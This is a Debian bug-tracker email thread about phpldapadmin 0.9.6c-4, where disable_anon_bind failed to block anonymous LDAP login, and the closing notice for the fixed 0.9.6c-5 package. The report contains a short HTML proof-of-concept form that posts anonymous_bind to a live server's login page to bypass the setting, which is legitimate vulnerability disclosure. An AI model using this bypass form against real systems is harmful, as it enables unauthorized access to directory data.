Your message dated Wed, 10 Aug 2005 10:32:17 -0700
with message-id <[EMAIL PROTECTED]>
and subject line Bug#322423: fixed in phpldapadmin 0.9.6c-5
has caused the attached Bug report to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere.  Please contact me immediately.)

Debian bug tracking system administrator
(administrator, Debian Bugs database)

--------------------------------------
Received: (at submit) by bugs.debian.org; 10 Aug 2005 15:35:26 +0000
From [EMAIL PROTECTED] Wed Aug 10 08:35:26 2005
Return-path: <[EMAIL PROTECTED]>
Received: from eol.lvk.cs.msu.su [158.250.17.73] 
        by spohr.debian.org with esmtp (Exim 3.36 1 (Debian))
        id 1E2sc1-0001oL-00; Wed, 10 Aug 2005 08:35:26 -0700
Received: by eol.lvk.cs.msu.su (Postfix, from userid 1000)
        id 1D7A6125C; Wed, 10 Aug 2005 19:35:23 +0400 (MSD)
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
From: Alexander Gerasiov <[EMAIL PROTECTED]>
To: Debian Bug Tracking System <[EMAIL PROTECTED]>
Subject: $servers[$i]['disable_anon_bind'] = true doesn't prevent anonymous access to the ldap directory
X-Mailer: reportbug 3.8
Date: Wed, 10 Aug 2005 19:35:23 +0400
Message-Id: <[EMAIL PROTECTED]>
Delivered-To: [EMAIL PROTECTED]

Package: phpldapadmin
Version: 0.9.6c-4
Severity: critical
Tags: security

Even if you deny anonymous login with disable_anon_bind, anyone could
access your LDAP server.

As far as I can see, this option only hides the checkbox on the login page, but
anyone can create a workaround hack:

==========example form to log into eol.lvk.cs.msu.su========
<html><body>

<form action="https://eol.lvk.cs.msu.su/phpldapadmin/login.php";
method="post" name="login_form">
<input type="hidden" name="server_id" value="0" />
<input type="checkbox" name="anonymous_bind" checked />
<input type="submit" name="submit" value="login" />
</form>

</body></html>
=============================================================

I think that the version in sarge is also vulnerable to this trick.

-- System Information:
Debian Release: 3.1
  APT prefers testing
  APT policy: (620, 'testing'), (600, 'unstable'), (550, 'experimental')
Architecture: i386 (i686)
Kernel: Linux 2.6.11-1-686
Locale: LANG=ru_RU.KOI8-R, LC_CTYPE=ru_RU.KOI8-R (charmap=KOI8-R)

Versions of packages phpldapadmin depends on:
ii  apache [httpd]               1.3.33-6    versatile, high-performance HTTP s
ii  debconf                      1.4.30.13   Debian configuration management sy
ii  php4                         4:4.3.10-15 server-side, HTML-embedded scripti
ii  php4-cgi                     4:4.3.10-15 server-side, HTML-embedded scripti
ii  php4-ldap                    4:4.3.10-15 LDAP module for php4

-- debconf information:
  phpldapadmin/ldap-bindpw: secret
  phpldapadmin/ldap-tls: false
  phpldapadmin/ldap-binddn: cn=admin,dc=eol,dc=lvk,dc=cs,dc=msu,dc=su
* phpldapadmin/reconfigure-webserver: apache
* phpldapadmin/restart-webserver: true
  phpldapadmin/ldap-basedn: dc=eol,dc=lvk,dc=cs,dc=msu,dc=su
  phpldapadmin/ldap-server: localhost
* phpldapadmin/ldap-authtype: cookie

---------------------------------------
Received: (at 322423-close) by bugs.debian.org; 10 Aug 2005 17:41:36 +0000
From [EMAIL PROTECTED] Wed Aug 10 10:41:36 2005
Return-path: <[EMAIL PROTECTED]>
Received: from katie by spohr.debian.org with local (Exim 3.36 1 (Debian))
        id 1E2uR7-0003uq-00; Wed, 10 Aug 2005 10:32:17 -0700
From: Fabio Tranchitella <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
X-Katie: $Revision: 1.56 $
Subject: Bug#322423: fixed in phpldapadmin 0.9.6c-5
Message-Id: <[EMAIL PROTECTED]>
Sender: Archive Administrator <[EMAIL PROTECTED]>
Date: Wed, 10 Aug 2005 10:32:17 -0700
Delivered-To: [EMAIL PROTECTED]

Source: phpldapadmin
Source-Version: 0.9.6c-5

We believe that the bug you reported is fixed in the latest version of
phpldapadmin, which is due to be installed in the Debian FTP archive:

phpldapadmin_0.9.6c-5.diff.gz
  to pool/main/p/phpldapadmin/phpldapadmin_0.9.6c-5.diff.gz
phpldapadmin_0.9.6c-5.dsc
  to pool/main/p/phpldapadmin/phpldapadmin_0.9.6c-5.dsc
phpldapadmin_0.9.6c-5_all.deb
  to pool/main/p/phpldapadmin/phpldapadmin_0.9.6c-5_all.deb

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Fabio Tranchitella <[EMAIL PROTECTED]> (supplier of updated phpldapadmin package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Format: 1.7
Date: Wed, 10 Aug 2005 17:14:01 +0000
Source: phpldapadmin
Binary: phpldapadmin
Architecture: source all
Version: 0.9.6c-5
Distribution: unstable
Urgency: high
Maintainer: Fabio Tranchitella <[EMAIL PROTECTED]>
Changed-By: Fabio Tranchitella <[EMAIL PROTECTED]>
Description: 
 phpldapadmin - web based interface for administering LDAP servers
Closes: 322423
Changes: 
 phpldapadmin (0.9.6c-5) unstable; urgency=high
 .
   * debian/control: added build-deps on dpatch.
   * debian/patches/login.dpatch: really block anonymous login when disabled
     by config files. (Closes: #322423)
Files: 
 59bd6b27ce9498c9c4408a36dcdbb388 617 admin extra phpldapadmin_0.9.6c-5.dsc
 a4e84ec8e644aa65d2b735f87ee734d6 13449 admin extra phpldapadmin_0.9.6c-5.diff.gz
 20d8733a521b99277a526caf61bc9c57 714834 admin extra phpldapadmin_0.9.6c-5_all.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (GNU/Linux)

iD8DBQFC+jYJK/juK3+WFWQRAhowAKCgt4oKUWxK0vC4+fpgtAjtZY0NnwCeP+zs
uXNUDOVdCNcBowv8aWp1ekM=
=ooMS
-----END PGP SIGNATURE-----

